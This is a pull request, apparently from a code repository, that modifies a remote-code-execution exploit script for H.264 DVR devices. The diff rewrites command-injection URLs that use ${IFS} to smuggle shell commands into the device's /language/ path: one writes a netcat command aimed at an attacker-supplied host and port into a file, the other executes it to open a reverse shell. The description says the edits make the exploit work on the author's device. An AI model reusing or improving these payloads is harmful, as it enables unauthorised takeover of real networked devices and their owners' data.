### PR TITLE
 Changes to be committed:

### DIFF
--- a/h264-dvr-rce.py
+++ b/h264-dvr-rce.py
@@ -86,7 +86,7 @@ def main():
 
         # Three ..
         try:
-            raw_url_request('%s://%s/language/Swedish${IFS}&&echo${IFS}nc${IFS}%s${IFS}%s${IFS}>e&&${IFS}/a'
+            raw_url_request('%s://%s/language/Swedish${IFS}&&echo${IFS}nc${IFS}%s${IFS}%s>e&&${IFS}/a'
                         % (target_url.scheme, target_url.netloc, match.group('host'), match.group('port')))
 
         # Two ...
@@ -96,7 +96,7 @@ def main():
 
 
         # One. Left off!
-            raw_url_request('%s://%s/language/Swedish&&$(cat${IFS}e)${IFS}&>r&&${IFS}/s'
+            raw_url_request('%s://%s/language/Swedish${IFS}&&$(cat${IFS}e)&${IFS}/s'
                          % (target_url.scheme, target_url.netloc))
 
         except (ConnectionError, Timeout, timeout) as e:


### PR DESCRIPTION
	modified:   h264-dvr-rce.py
	Countdown step 3 removed unnecessary ${IFS} that prevented code from working on my device
	Countdown step 1 added ${IFS} for consistency, removed code that redirects to "r" file, changed && to & so Success message will be printed immediately instead of after exiting the reverse shell